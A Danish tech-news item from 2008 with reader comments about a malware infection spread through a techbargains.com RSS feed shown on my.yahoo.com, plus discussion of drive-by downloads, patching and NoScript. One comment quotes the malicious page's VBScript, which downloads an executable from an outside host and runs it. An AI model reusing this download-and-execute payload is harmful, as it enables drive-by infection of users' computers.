mboost-dp1

SXC - clix

RSS-feed leder til malware-infektion

- Via Softpedia - , redigeret af Emil

Brugere af tjenesten my.yahoo.com opdagede for nyligt, at noget ikke var, som det skulle være med deres side, og berettede, at de fik publiceret et link til en mistænkelig side.

Deres mistænkelighed viste sig at være berettiget. Siden blev brugt til at inficere uvidende brugeres maskiner med filen rondll32.exe, der sørger for at installere yderligere programmer på ens computer, som blandt andet kan give uvedkommende adgang til computeren.

Problemet stammer dog ikke fra Yahoo!, men skyldes et RSS-feed, som mange brugere har tilføjet til deres side fra hjemmesiden techbargains.com. Hos techbargains.com er man meget kede af, hvad der er sket, og tilbyder brugerne at kunne hente flere forskellige gratis antivirus-programmer hos dem, samt påpeger, at de vil sikre, det ikke kan ske igen.

techbargain.com skrev:
We tracked down the root cause and have taken strong actions to prevent this from occurring again. We may need to take some further steps in next few days that could bring down the site for temporary periods and we appreciate your patience during that time.





Gå til bund
Gravatar #1 - runeks
11. aug. 2008 06:48
For mig at se er problemet ikke at der bliver linket til en "mistæneklig" side med en link til en program. Problemet er sgu at folk skal forstå at man ikke bare skal downloade og køre tilfældige programmer på ens computer.

Ingen form for sikkerhed, som ikke fuldstændig lammer brugeren i hans almindelige og legitime adfærd, kan beskytte ham hvis han synes det er fint at lade ukendte programmer køre på sin computer.

Det synes jeg man bør lære uerfarne PC-brugere.
Gravatar #2 - memborg
11. aug. 2008 07:14
Ja, det er problemet med internet brugere idag og det bliver ikke bedre fremover. Folk tænker sig ikke om og trykker på alt hvor man kan vinde penge eller se nogle bare bryster. Det kræver opdragelse at få folk til at tænke sig om. Man kunne jo starte i skolen, med undervisning ti sund fornuft.
Gravatar #3 - jonasbh
11. aug. 2008 08:39
#1+2

Tidligere ville jeg være enig med jer, men ikke mere. 1tonsmindre.dk, berlingske.dk eb.dk og um.dk har været ramt på det seneste. Nogle angrib er drive-bys, hvilket er meget svært at lære folk. Tidligere kunne man sige at et besøg hos sekendtesnøgenbilledergratis.com var en åbenlys risiko, men når store danske hjemmesider er ramt. Opdatering, opdatering og opdatering er det mindre IT-kyndige skal lære. Jeg giver bl.a. det råd at bruge filehippo.com. Dermed kan flere år gamle versioner af flash blive opdateret.
Gravatar #4 - p1x3l
11. aug. 2008 10:00
man ka stadig sige alt der virker for godt til at være sandt er sq nok falsk

#3 hva hjælper en opdatering når brugerr clicker på YOURE NUMBER 1,000,000 ON THIS SITE CLICK HERE

og bedre vista åbne den .exe så er der ik meget at gøre mere

det er alt alt for kompliceret at lave et program der ka genkende de ting især nyere trusler.... men der er vores hjerne i det mindste foran enu .. for dem der bruger den .. er det, det eneste der er at gøre
Gravatar #5 - jonasbh
11. aug. 2008 10:14
Problemet er jo, at der ikke behøver at være indblanding fra brugeren. Læs f.eks. om Drive by: http://en.wikipedia.org/wiki/Drive-by_download
Gravatar #6 - runeks
11. aug. 2008 13:24
#3: Jeg mener stadig at alle PC-brugere ville drage stor fordel af at forstå at man ikke bare downloader et eller andet program som man reelt ikke ved hvad er og kører det på ens computer.

Men jeg giver dig helt ret i at det er vigtigt at opdatere sine programmer, specielt browser og plugins dertil. Jeg kan tilføje Firefox-pluginet NoScript til listen over nyttige tricks mod angreb såsom det der er beskrevet i nyheden.

Det kræver selvfølgelig at folk er klar over hvornår, og speciult hvornår ikke, de skal tillade scripts/flash-indhold at blive kørt på en side.


Offtopic: Siden som indeholder den angiveligt skadelige kode indeholder følgende script:

<object classid="clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F" id="test"></object>
<script language="vbscript">
test.GetFile "http://www.plgou.com/csrss/rondll32.exe","c:\\msyahoo.exe",5,1,"tiany"
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run"c:\\msyahoo.exe"
</script>


Er det virkelig så nemt at få et program eksekveret via vbscript i Windows? Jeg bliver gladere og gladere for at jeg bruger Linux (og NoScript) :).
Gå til top

Opret dig som bruger i dag

Det er gratis, og du binder dig ikke til noget.

Når du er oprettet som bruger, får du adgang til en lang række af sidens andre muligheder, såsom at udforme siden efter eget ønske og deltage i diskussionerne.

Opret Bruger Login